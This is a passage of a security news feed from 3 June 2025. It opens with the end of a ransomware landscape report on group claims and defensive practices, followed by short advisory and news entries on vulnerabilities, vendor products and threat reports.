newly emerged ransomware group calling itself "J" has launched an onion DLS, following earlier signs of activity observed in March 2025. In its initial disclosure, J listed multiple organizations across South America, Australia, Europe, the U.S., and Asia. The group has shared file trees of allegedly compromised data from victim organizations in support of their claims. Notable Ransomware Attacks Here are some of the notable ransomware attacks that occurred in May, sourced from Cyble dark web researchers and OSINT sources. Several of the claimed attacks are noteworthy for their potential impact on the software supply chain and critical infrastructure. Many of the attack claims were unconfirmed by victim organizations, hence Cyble’s characterization of the alleged attacks as claims. The UK was hit by high-profile retail cyberattacks in late April and early May, with possible connections to Scattered Spider and DragonForce ransomware. The Silent ransomware group claimed to have compromised a U.S.-based network security company. The group alleges it exfiltrated 764 GB of data across 186,955 files and posted several samples appearing to show access to internal configuration files, encrypted data blocks, system logs, and administrative commands, but responses from the company appear to dispute the significance of the data. The Qilin ransomware group claimed responsibility for compromising a U.S. satellite communications (SATCOM) and cybersecurity solutions provider to defense, government, aerospace, and critical infrastructure clients. File samples suggest that the allegedly stolen data appears to span multiple years and includes both personal identity information and operational business files. Qilin also claimed responsibility for an attack on a Japanese shipbuilder, potentially exposing data not just related to merchant ship construction but also related to the Japanese Coast Guard/Navy. The Termite ransomware group claimed to exfiltrate over 550 GB data containing 700,000 files from a French technology company and supplier in the French aerospace and defense ecosystem. Play ransomware claimed to compromise a U.S. emergency communication and early warning systems provider to government, military and critical infrastructure. The Akira ransomware group claimed responsibility for a cyberattack on a U.S.-based energy trading subsidiary of a Japanese corporation. The Lynx ransomware group claimed responsibility for a cyberattack on a Saudi Arabian architecture and engineering firm, while Qilin claimed responsibility for a cyberattack on a Singapore-based construction and engineering firm. The INC Ransom group claimed responsibility for an attack on a South African airline. The BERT ransomware group claimed to have compromised a Taiwanese manufacturer of automation equipment for the semiconductor, LED, and passive component industries. The company responded that there was no significant operational or data impact. The Medusa ransomware group claimed responsibility for compromising a U.S.-based technology solutions provider specializing in IT infrastructure, cloud services, cybersecurity, and systems integration for public sector and enterprise clients. The Akira ransomware group claimed a cyberattack on a Greece-based international shipping company specializing in the transportation of petroleum and chemical products. A U.S.-based developer of mathematical computing software confirmed that it had experienced a ransomware attack that led to outages in both customer-facing applications and internal platforms. The Arkana ransomware group claimed responsibility for an attack on a UK-based multinational mining company. The Qilin ransomware group claimed responsibility for a cyberattack targeting a U.S. contract pharmaceutical manufacturer. The Play ransomware group claimed to have compromised a U.S.-based provider of high-performance graphics, video capture, and signal processing solutions for the defense and aerospace industries. The Everest ransomware group claimed to have breached a UAE-based airline and a Saudi Arabian pharmaceutical company. Conclusion The resilience of ransomware actors and affiliates in the face of major upheaval among the leading groups underscores the ever-present threat of ransomware and highlights the enduring importance of cybersecurity best practices for protecting against a wide range of cyber threats. Consistent application of good security practices is critical for building organizational resilience and limiting the impact of any cyberattacks that do occur. Those basic defensive and cyber hygiene practices include prioritizing vulnerabilities based on risk, protecting web-facing assets, segmenting networks and critical assets, implementing ransomware-resistant backups and Zero Trust principles, proper configuration and secrets protection, hardened endpoints and infrastructure, and network, endpoint and cloud monitoring. Cyble’s comprehensive attack surface management solutions can help by scanning network and cloud assets for exposures and prioritizing fixes, in addition to monitoring for leaked credentials and other early warning signs of major cyberattacks. Get a free threat assessment report for your organization. The post Ransomware Landscape May 2025: SafePay, DevMan Emerge as Major Threats appeared first on Cyble.

https://cyble.com/blog/top-ransomware-groups-may-2025-safepay-devman-rise/
Creating the right organisational culture for cyber security
2025-06-03T12:42:20Z | 1748954540

Calling cyber security professionals, culture specialists and leaders to drive uptake of new Cyber security culture principles.

https://www.ncsc.gov.uk/blog-post/creating-the-right-organisational-culture-for-cyber-security
Insider Threat Detection and Internal Network Security Monitoring with Deception
2025-06-03T12:20:30Z | 1748953230

Insider threats are dangerous because they exploit trust, access, and familiarity with systems—often going undetected for months. Real-time monitoring and deception tech provide the visibility and proof needed to detect them. Insider threats represent one of the most complex challenges in cybersecurity today, not because of volume, but because of subtlety. Unlike external attacks, insider […] The post Insider Threat Detection and Internal Network Security Monitoring with Deception appeared first on CounterCraft.

https://www.countercraftsec.com/blog/insider-threat-detection-internal-network-security-monitoring-with-deception/
Meta and Yandex are de-anonymizing Android users’ web browsing identifiers
2025-06-03T12:00:48Z | 1748952048

Abuse allows Meta and Yandex to attach persistent identifiers to detailed browsing histories.

https://arstechnica.com/security/2025/06/meta-and-yandex-are-de-anonymizing-android-users-web-browsing-identifiers/
Cisco to Power Monumental Sports & Entertainment's Brand-New, High-Tech Arena in Downtown D.C. as Part of Innovative Partnership
2025-06-03T12:00:00Z | 1748952000

Monumental Sports & Entertainment and Cisco unveiled a transformative new partnership between the two companies, to power MSE’s new arena in downtown Washington, D.C. More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m06/cisco-to-power-monumental-sports-entertainment-brand-new-high-tech-arena-in-downtown-d-c-as-part-of-innovative-partnership.html
Cisco to Power Monumental Sports & Entertainment's Brand-New, High-Tech Arena in Downtown D.C. as Part of Innovative Partnership
2025-06-03T12:00:00Z | 1748952000

Monumental Sports & Entertainment and Cisco unveiled a transformative new partnership between the two companies, to power MSE’s new arena in downtown Washington, D.C. More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m06/cisco-to-power-monumental-sports-entertainment-brand-new-high-tech-arena-in-downtown-d-c-as-part-of-innovative-partnership.html
Honoring Innovation, Growth, and Collaboration: The Akamai Partner Awards
2025-06-03T12:00:00Z | 1748952000

Introducing the Akamai Partner Awards, which recognize excellence ? both organizational and individual ? in sales, services, marketing, and technical impact.

https://www.akamai.com/blog/partners/2025/jun/honoring-innovation-growth-collaboration-akamai-partner-awards
78% of Security Leaders Say Tool Sprawl Challenges Threat Mitigation
2025-06-03T12:00:00Z | 1748952000

A recent Barracuda Networks survey found that 65% of IT and security professionals say their organizations are juggling too many security tools.

https://www.securitymagazine.com/articles/101667-78-of-security-leaders-say-tool-sprawl-challenges-threat-mitigation
Rezultati drugog Hackultet natjecanja
2025-06-03T11:44:38Z | 1748951078

Završio je drugi Hackultet, CTF natjecanje iz kibernetičke sigurnosti za studente, a pobjedu je odnio tim Konsenzus s 9605 bodova. Tim je sastavljen od studenata Fakulteta elektrotehnike i računarstva, Tehničkog veleučilišta u Zagrebu i Sveučilišta Algebra Bernays. Na drugom Hackultetu sudjelovalo je 16 timova – 80 studenata. Zahvaljujemo svima na sudjelovanju i čestitamo na ostvarenim... The post Rezultati drugog Hackultet natjecanja first appeared on CERT.hr.

https://www.cert.hr/rezultati-drugog-hackultet-natjecanja/
Illicit crypto-miners pouncing on lazy DevOps configs that leave clouds vulnerable
2025-06-03T11:23:15Z | 1748949795

To stop the JINX-0132 gang behind these attacks, pay attention to HashiCorp, Docker, and Gitea security settings Up to a quarter of all cloud users are at risk of having their computing resources stolen and used to illicitly mine for cryptocurrency, after crims cooked up a campaign that targets publicly accessible DevOps tools.

https://go.theregister.com/feed/www.theregister.com/2025/06/03/illicit_miners_hashicorp_tools/
SAP Business AI Delivering Unparalleled Business Value Through Innovation and Partnerships
2025-06-03T11:15:00Z | 1748949300

At SAP Sapphire, SAP shared the latest innovations and highlighted the enormous momentum among customers and partners.

https://news.sap.com/2025/06/sap-business-ai-business-value-innovation-partnerships/
Scattered Spider: Understanding Help Desk Scams and How to Defend Your Organization
2025-06-03T11:00:00Z | 1748948400

In the wake of high-profile attacks on UK retailers Marks & Spencer and Co-op, Scattered Spider has been all over the media, with coverage spilling over into the mainstream news due to the severity of the disruption caused — currently looking like hundreds of millions in lost profits for M&S alone.  This coverage is extremely valuable for the cybersecurity community as it raises...

https://thehackernews.com/2025/06/scattered-spider-understanding-help.html
The Era of the Defender Starts Now: Control. Contain. Win.
2025-06-03T11:00:00Z | 1748948400

With over $100 million raised to date and a 300% revenue surge since our last round, Zero Networks is proving that defenders don’t have to lose. Zero’s Series C milestone doesn’t just fund growth – it fuels a paradigm shift: welcome to the era of the defender.  For years, defenders have been saddled with a crushing disadvantage. Day in and day out, they’ve faced an ever-sprawling battlefield screaming with alerts and unpredictable, relentless risks. Lateral…

https://zeronetworks.com/blog/the-era-of-the-defender-starts-now-control-contain-win
Game-Changing AI: Team Liquid and SAP Join Forces for Next-Gen Esports Analytics
2025-06-03T10:15:00Z | 1748945700

To perform at the highest level in professional gaming, Team Liquid is constantly thinking of new ways to gain more insights from its data.

https://news.sap.com/2025/06/team-liquid-joule-ai-next-gen-esports-analytics/
Host-based logs, container-based threats: How to tell where an attack began
2025-06-03T10:00:14Z | 1748944814

Kaspersky expert shares insights on how to determine whether an attack was first launched in a container or on the host itself when an organization’s logs lack container visibility.

https://securelist.com/host-based-logs-container-based-threats/116643/
Lost in Resolution: Azure OpenAI's DNS Resolution Issue
2025-06-03T10:00:13Z | 1748944813

We discovered an Azure OpenAI misconfiguration allowing shared domains, potentially leading to data leaks. Microsoft quickly resolved the issue. The post Lost in Resolution: Azure OpenAI's DNS Resolution Issue appeared first on Unit 42.

https://unit42.paloaltonetworks.com/azure-openai-dns-resolution/
FBI Cyber Division deputy director departs for anti-ransomware firm
2025-06-03T10:00:00Z | 1748944800

Cynthia Kaiser will serve as senior vice president for Halcyon’s Ransomware Research Center.

https://www.nextgov.com/people/2025/06/fbi-cyber-division-deputy-director-departs-anti-ransomware-firm/405748/
Bling slinger Cartier tells customers to be wary of phishing attacks after intrusion
2025-06-03T09:52:21Z | 1748944341

Nothing terribly valuable taken in data heist, though privacy a little tarnished Global jewelry giant Cartier is writing to customers to confirm their data was exposed to cybercriminals that broke into its systems.

https://go.theregister.com/feed/www.theregister.com/2025/06/03/cartier_attack_data_theft/
Android Trojan Crocodilus Now Active in 8 Countries, Targeting Banks and Crypto Wallets
2025-06-03T09:34:00Z | 1748943240

A growing number of malicious campaigns have leveraged a recently discovered Android banking trojan called Crocodilus to target users in Europe and South America. The malware, according to a new report published by ThreatFabric, has also adopted improved obfuscation techniques to hinder analysis and detection, and includes the ability to create new contacts in the victim's contacts list. "Recent...

https://thehackernews.com/2025/06/android-trojan-crocodilus-now-active-in.html
8 gute Gründe für einen Umstieg auf ein Datencenter-Netzwerk von Juniper
2025-06-03T09:26:58Z | 1748942818

Official Juniper Networks Blogs 8 gute Gründe für einen Umstieg auf ein Datencenter-Netzwerk von Juniper Datencenter-Netzwerke sind ein hochaktuelles Thema und Juniper bietet in vielerlei Hinsicht beispiellose Lösungen. Doch warum jetzt? Und warum Juniper? Zunächst einmal: Warum ist das Thema gerade so wichtig? Das liegt The post 8 gute Gründe für einen Umstieg auf ein Datencenter-Netzwerk von Juniper appeared first on Official Juniper Networks Blogs.

https://blogs.juniper.net/de-de/german-blog/8-great-reasons-to-switch-to-juniper-data-center-networks-de
K000141509: Intel UEFI vulnerability CVE-2024-21781
2025-06-03T08:22:05Z | 1748938925

Security Advisory Description Improper input validation in UEFI firmware for some Intel(R) Processors may allow a privileged user to enable information disclosure or denial of service via local ...

https://my.f5.com/manage/s/article/K000141509
K000141505: Intel UEFI vulnerability CVE-2024-21829
2025-06-03T08:17:19Z | 1748938639

Security Advisory Description Improper input validation in UEFI firmware error handler for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege via ...

https://my.f5.com/manage/s/article/K000141505
Case Study: How Junie Uses TeamCity to Evaluate Coding Agents
2025-06-03T07:57:45Z | 1748937465

Introduction Junie is an intelligent coding agent developed by JetBrains. It automates the full development loop: reading project files, editing code, running tests, and applying fixes, going far beyond simple code generation. Similar to how developers use tools like ChatGPT to solve coding problems, Junie takes it a step further by automating the entire process. […]

https://blog.jetbrains.com/teamcity/2025/06/how-junie-uses-teamcity/
Google Chrome to Distrust Two Certificate Authorities Over Compliance and Conduct Issues
2025-06-03T07:48:00Z | 1748936880

Google has revealed that it will no longer trust digital certificates issued by Chunghwa Telecom and Netlock citing "patterns of concerning behavior observed over the past year." The changes are expected to be introduced in Chrome 139, which is scheduled for public release in early August 2025. The current major version is 137.  The update will affect all Transport Layer Security (TLS)...

https://thehackernews.com/2025/06/google-chrome-to-distrust-two.html
K000141500: Intel BIOS vulnerability CVE-2024-23599
2025-06-03T07:41:54Z | 1748936514

Security Advisory Description Race condition in Seamless Firmware Updates for some Intel(R) reference platforms may allow a privileged user to potentially enable denial of service via local access.

https://my.f5.com/manage/s/article/K000141500
APRA Compliance, Simplified by Cyble
2025-06-03T07:41:53Z | 1748936513

Australia’s fintech sector is undergoing rapid evolution. With a booming A$45 billion fintech industry and a $10 trillion financial services market, the nation has become a global hub for digital finance innovation. However, this progress comes with heightened scrutiny and regulatory pressure. The Australian Prudential Regulation Authority (APRA) and the Australian Cyber Security Centre (ACSC) are urging organizations to implement strong cyber hygiene measures—especially the Essential 8—as a baseline for defending against cyber threats. Meeting these requirements can be daunting for fintechs and small-to-medium businesses (SMBs) due to high implementation costs and technical complexity. That’s where Cyble steps in. Cyble’s Essential 8 Support Package offers a quick and affordable path to compliance, enabling regulated entities to hone confidence while adopting Essential 8. Understanding APRA and the Essential 8 Founded in 1998, APRA is the primary regulator for Australia’s banking, insurance, and superannuation sectors. APRA emphasizes cyber resilience through the ACSC’s Essential Eight—a set of baseline mitigation strategies proven to prevent or limit the impact of cybersecurity incidents. The Essential 8 includes: Application patching Operating system patching Multi-factor authentication (MFA) Restricting administrative privileges Application control Restricting Microsoft Office macros User application hardening Regular backups Initially released in June 2017 and continuously updated based on threat intelligence and field experience, the Essential Eight Maturity Model supports organizations in tracking and improving their cyber defenses. According to KPMG’s Pulse of Fintech H2’24 report, although Australian fintech investment reached $1.1 billion in H2 2024—driven by a few large-scale acquisitions—early-stage startups continue to struggle, leaving many without the resources or infrastructure to implement enterprise-grade cybersecurity measures. Cyble’s Essential 8 Support Package: A Tailored Cybersecurity Solution Recognizing this gap, Cyble has launched a focused Essential 8 Support Package, designed explicitly for SMBs operating within APRA-regulated entities. These include: Authorized Deposit-Taking Institutions General Insurance Providers Life Insurance and Friendly Societies Private Health Insurers Superannuation Funds Cyble’s solution combines advanced threat intelligence, vulnerability scanning, and risk assessment to help organizations efficiently implement and maintain the Essential 8 controls. What’s Inside the Cyble Support Package? The Cyble support package is engineered for proactive defense and compliance monitoring. Here’s how it helps align with the Essential 8 requirements: In addition, Cyble's package includes: External Attack Surface Management (EASM) scans Digital Risk Monitoring for code leaks on platforms like GitHub, Pastebin, and Discord Continuous monitoring of open-source software (OSS) and third-party vulnerabilities Credential leak detection and threat actor chatter surveillance on deep and dark web forums Each feature is tied to specific SKUs—vulnerability Management, Attack Surface Management (ASM), Dark Web (DW), Data Leaks, Web Scan Apps, and Cloud Security Posture Management (CSPM)—ensuring granular visibility and accountability. Why Compliance Is Now Mission-Critical for Australia’s Fintech Sector Australia is home to some of the world’s most innovative financial technology companies, so the sector is no stranger to digital disruption. But innovation must be balanced with compliance—especially in a regulatory environment where changes in Buy Now Pay Later (BNPL) laws, AML/CTF frameworks, digital asset regulation, and privacy legislation are all tightening the screws. According to Chambers and Partners, Australia is entering a phase of regulatory maturity, where cybersecurity isn’t just a best practice—it’s a legal and operational necessity. Cyble’s Essential 8 support package ensures that fintech and SMBs aren’t left behind due to budget or capability constraints. Bridging Innovation and Compliance Australia’s fintech landscape thrives on innovation, but compliance with frameworks like the Essential 8 will sustain its long-term growth and security. Cyble offers an affordable, scalable, and technically driven solution to help organizations easily comply with APRA’s expectations. With Cyble’s support package, SMBs and fintech firms can move beyond checklist compliance and into the realm of continuous cyber resilience, without sacrificing innovation or incurring prohibitive costs. Contact Cyble today to learn how your organization can achieve Essential Eight compliance—securely, efficiently, and affordably. References: https://practiceguides.chambers.com/practice-guides/fintech-2025/australia/trends-and-developments https://www.cyber.gov.au/resources-business-and-government/essential-cybersecurity/essential-eight/essential-eight-maturity-model-ism-mapping https://international.austrade.gov.au/en/do-business-with-australia/sectors/technology/fintech#accordion-97decbd5c0-item-f2222844e8 https://kpmg.com/au/en/home/insights/2023/11/australian-fintech-survey-report-2023.html https://www.cyber.gov.au/resources-business-and-government/essential-cybersecurity/essential-eight https://www.cyber.gov.au/resources-business-and-government/essential-cybersecurity/essential-eight/essential-eight-explained https://kpmg.com/au/en/home/insights/2024/08/pulse-of-fintech.html The post APRA Compliance, Simplified by Cyble appeared first on Cyble.

https://cyble.com/blog/apra-compliance-simplified-by-cyble/
Microsoft and CrowdStrike Launch Shared Threat Actor Glossary to Cut Attribution Confusion
2025-06-03T07:20:00Z | 1748935200

Microsoft and CrowdStrike have announced that they are teaming up to align their individual threat actor taxonomies by publishing a new joint threat actor mapping. "By mapping where our knowledge of these actors align, we will provide security professionals with the ability to connect insights faster and make decisions with greater confidence," Vasu Jakkal, corporate vice president at Microsoft...

https://thehackernews.com/2025/06/microsoft-and-crowdstrike-launch-shared.html
Navigating DORA: How Sekoia.io can support your compliance journey
2025-06-03T07:00:00Z | 1748934000

As the cyber threat landscape evolves and the digital landscape changes, regulatory frameworks continue to emerge, aiming to bolster the security posture of organisations, particularly in the financial sector. One such regulation is the Digital Operational Resilience Act (DORA), effective since January 2025, which sets stringent security requirements for financial entities operating within the European […] La publication suivante Navigating DORA: How Sekoia.io can support your compliance journey est un article de Sekoia.io Blog.

https://blog.sekoia.io/navigating-dora-compliance-with-sekoia/
Introducing Akamai DNS Posture Management
2025-06-03T06:30:00Z | 1748932200

https://www.akamai.com/blog/security/2025/jun/introducing-akamai-dns-posture-management
ZDI-CAN-26855: Ivanti
2025-06-03T05:00:00Z | 1748926800

A CVSS score 7.2 AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H severity vulnerability discovered by '06fe5fd2bc53027c4a3b7e395af0b850e7b8a044' was reported to the affected vendor on: 2025-06-03, 3 days ago. The vendor is given until 2025-09-01 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26661: Trend Micro
2025-06-03T05:00:00Z | 1748926800

A CVSS score 7.0 AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Xavier DANEST - Decathlon' was reported to the affected vendor on: 2025-06-03, 3 days ago. The vendor is given until 2025-10-01 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26834: Ivanti
2025-06-03T05:00:00Z | 1748926800

A CVSS score 8.8 AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by '06fe5fd2bc53027c4a3b7e395af0b850e7b8a044' was reported to the affected vendor on: 2025-06-03, 3 days ago. The vendor is given until 2025-09-01 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27248: NVIDIA
2025-06-03T05:00:00Z | 1748926800

A CVSS score 7.5 AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N severity vulnerability discovered by 'Ho Xuan Ninh (@izx) + Tri Dang (Sea Security)' was reported to the affected vendor on: 2025-06-03, 3 days ago. The vendor is given until 2025-10-01 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27181: NVIDIA
2025-06-03T05:00:00Z | 1748926800

A CVSS score 7.5 AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N severity vulnerability discovered by 'Ho Xuan Ninh (@izx) + Tri Dang (Sea Security)' was reported to the affected vendor on: 2025-06-03, 3 days ago. The vendor is given until 2025-10-01 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27168: NSF Unidata
2025-06-03T05:00:00Z | 1748926800

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Fady Othman' was reported to the affected vendor on: 2025-06-03, 3 days ago. The vendor is given until 2025-10-01 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27267: NSF Unidata
2025-06-03T05:00:00Z | 1748926800

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Fady Osman' was reported to the affected vendor on: 2025-06-03, 3 days ago. The vendor is given until 2025-10-01 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27169: LiteLLM
2025-06-03T05:00:00Z | 1748926800

A CVSS score 6.5 AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N severity vulnerability discovered by 'Alfredo Oliveira of Trend Research' was reported to the affected vendor on: 2025-06-03, 3 days ago. The vendor is given until 2025-10-01 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27266: NSF Unidata
2025-06-03T05:00:00Z | 1748926800

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Fady Osman' was reported to the affected vendor on: 2025-06-03, 3 days ago. The vendor is given until 2025-10-01 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27269: NSF Unidata
2025-06-03T05:00:00Z | 1748926800

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Fady Osman' was reported to the affected vendor on: 2025-06-03, 3 days ago. The vendor is given until 2025-10-01 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-25-321: GIMP ICO File Parsing Integer Overflow Remote Code Execution Vulnerability
2025-06-03T05:00:00Z | 1748926800

This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-5473.

http://www.zerodayinitiative.com/advisories/ZDI-25-321/
ZDI-25-322: 2BrightSparks SyncBackFree Link Following Local Privilege Escalation Vulnerability
2025-06-03T05:00:00Z | 1748926800

This vulnerability allows local attackers to escalate privileges on affected installations of 2BrightSparks SyncBackFree. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. User interaction on the part of an administrator is also required. The ZDI has assigned a CVSS rating of 7.3. The following CVEs are assigned: CVE-2025-5474.

http://www.zerodayinitiative.com/advisories/ZDI-25-322/
ZDI-25-323: Action1 Uncontrolled Search Path Element Local Privilege Escalation Vulnerability
2025-06-03T05:00:00Z | 1748926800

This vulnerability allows local attackers to escalate privileges on affected installations of Action1. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-5480.

http://www.zerodayinitiative.com/advisories/ZDI-25-323/
ZDI-25-324: Sante DICOM Viewer Pro DCM File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability
2025-06-03T05:00:00Z | 1748926800

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Sante DICOM Viewer Pro. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-5481.

http://www.zerodayinitiative.com/advisories/ZDI-25-324/
Rebuilding Digital Consent from the Ground Up
2025-06-03T05:00:00Z | 1748926800

Consent is supposed to be simple. In its ideal form, it’s a clear, mutual agreement between two parties. But in today’s digital ecosystem, it’s become anything but.

https://www.securitymagazine.com/blogs/14-security-blog/post/101663-rebuilding-digital-consent-from-the-ground-up
Cisco Meraki MX and Z Series Teleworker Gateway AnyConnect VPN Denial of Service Vulnerabilities
2025-06-03T04:22:28Z | 1748924548

Multiple vulnerabilities in the Cisco AnyConnect VPN server of Cisco Meraki MX and Cisco Meraki Z Series Teleworker Gateway devices could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition to the AnyConnect VPN service on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. Cisco Meraki has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-meraki-mx-vpn-dos-QTRHzG2 Security Impact Rating: High CVE: CVE-2024-20498,CVE-2024-20499,CVE-2024-20500,CVE-2024-20501,CVE-2024-20502,CVE-2024-20513

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-meraki-mx-vpn-dos-QTRHzG2
Cisco Meraki MX and Z Series Teleworker Gateway AnyConnect VPN Session Takeover and Denial of Service Vulnerability
2025-06-03T04:22:27Z | 1748924547

A vulnerability in the Cisco AnyConnect VPN server of Cisco Meraki MX and Cisco Meraki Z Series Teleworker Gateway devices could allow an unauthenticated, remote attacker to hijack an AnyConnect VPN session or cause a denial of service (DoS) condition for individual users of the AnyConnect VPN service on an affected device. This vulnerability is due to weak entropy for handlers that are used during the VPN authentication process as well as a race condition that exists in the same process. An attacker could exploit this vulnerability by correctly guessing an authentication handler and then sending crafted HTTPS requests to an affected device. A successful exploit could allow the attacker to take over the AnyConnect VPN session from a target user or prevent the target user from establishing an AnyConnect VPN session with the affected device. Cisco Meraki has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-meraki-mx-vpn-dos-by-QWUkqV7X Security Impact Rating: Medium CVE: CVE-2024-20509

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-meraki-mx-vpn-dos-by-QWUkqV7X
New Chrome Zero-Day Actively Exploited; Google Issues Emergency Out-of-Band Patch
2025-06-03T04:22:00Z | 1748924520

Google on Monday released out-of-band fixes to address three security issues in its Chrome browser, including one that it said has come under active exploitation in the wild. The high-severity flaw is being tracked as CVE-2025-5419 (CVSS score: 8.8), and has been flagged as an out-of-bounds read and write vulnerability in the V8 JavaScript and WebAssembly engine. "Out-of-bounds read and...

https://thehackernews.com/2025/06/new-chrome-zero-day-actively-exploited.html
High Threat Security Alert (A25-06-01): Multiple Vulnerabilities in Google Chrome
2025-06-03T04:00:00Z | 1748923200

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A25-06-02): Multiple Vulnerabilities in Android
2025-06-03T04:00:00Z | 1748923200

Google has released Android Security Bulletin June 2025 to fix multiple security vulnerabilities in Android operating system.

https://www.govcert.gov.hk/en/alerts_detail.php
Splunk Products Multiple Vulnerabilities
2025-06-03T01:00:00Z | 1748912400

Multiple vulnerabilities were identified in Splunk products. A remote attacker could exploit some of these vulnerabilities to trigger cross-site scripting and elevation of privilege on the targeted system. Impact Cross-Site Scripting Elevation of Privilege System / Technologies affected Splunk Enterprise versions below 9.4.2, 9.3.4 and 9.2.6 Splunk Cloud Platform versions below 9.3.2411.102, 9.3.2408.111 and 9.2.2406.118 Splunk Universal Forwarder for Windows versions below 9.4.2, 9.3.4, 9.2.6, and 9.1.9 Solutions Before installation of the software, please visit the vendor web-site for more details.   Apply fixes issued by the vendor: https://advisory.splunk.com//advisories/SVD-2025-0601 https://advisory.splunk.com//advisories/SVD-2025-0602

https://www.hkcert.org/security-bulletin/splunk-products-multiple-vulnerabilities_20250603
Samsung Products Multiple Vulnerabilities
2025-06-03T01:00:00Z | 1748912400

Multiple vulnerabilities were identified in Samsung Products. A remote attacker could exploit some of these vulnerabilities to trigger denial of service condition, elevation of privilege, security restriction bypass, sensitive information disclosure and data manipulation on the targeted system.   [Updated on 2025-06-04... Impact Denial of Service Elevation of Privilege Security Restriction Bypass Information Disclosure Data Manipulation System / Technologies affected Samsung mobile devices running Android 13, 14, 15 Exynos 980, 990, 1080, 1280, 1380, 1480, 2100, 2200, 2400 For affected products, please refer to the link below: https://security.samsungmobile.com/securityUpdate.smsb https://semiconductor.samsung.com/support/quality-support/product-security-updates/ Solutions Before installation of the software, please visit the vendor website for more details.   Apply fixes issued by the vendor: https://security.samsungmobile.com/securityUpdate.smsb https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2024-7881/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-23095/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-23096/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-23097/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-23098/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-23099/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-23100/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-23101/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-23102/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-23103/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-23104/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-23105/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-23106/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-23107/

https://www.hkcert.org/security-bulletin/samsung-products-multiple-vulnerabilities_20250603
RedHat Linux Kernel Multiple Vulnerabilities
2025-06-03T01:00:00Z | 1748912400

